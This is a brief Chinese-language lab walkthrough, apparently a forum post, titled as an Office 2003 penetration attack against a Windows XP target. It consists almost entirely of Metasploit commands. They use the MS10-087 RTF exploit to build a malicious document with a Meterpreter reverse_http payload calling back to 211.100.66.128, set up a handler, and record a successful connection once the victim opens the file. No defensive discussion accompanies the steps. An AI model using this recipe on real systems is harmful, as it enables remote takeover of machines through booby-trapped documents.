office 2003渗透攻击
实验环境
靶机是windows XP 攻击机是kali
实验步骤
靶机IP地址
攻击机IP地址
- msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
复制代码
- msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
复制代码
- msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http
复制代码
- msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 211.100.66.128
复制代码
show options看一下
- msf exploit(ms10_087_rtf_pfragments_bof) > exploit
复制代码
- root@bt:~# cp /root/.msf4/local/ms10087.rtf /root/ms10087.rtf
复制代码
将文档从BT5拷贝到WIN XP靶机上
- msf > use exploit/multi/handler
复制代码
- msf exploit(handler) > set payload windows/meterpreter/reverse_http
- payload => windows/meterpreter/reverse_http
复制代码
msf exploit(handler) >
msf exploit(handler) > set LHOST 211.100.66.128
LHOST => 211.100.66.128
show options看一下
在靶机双击打开文件
- msf exploit(handler) > exploit
复制代码
成功连接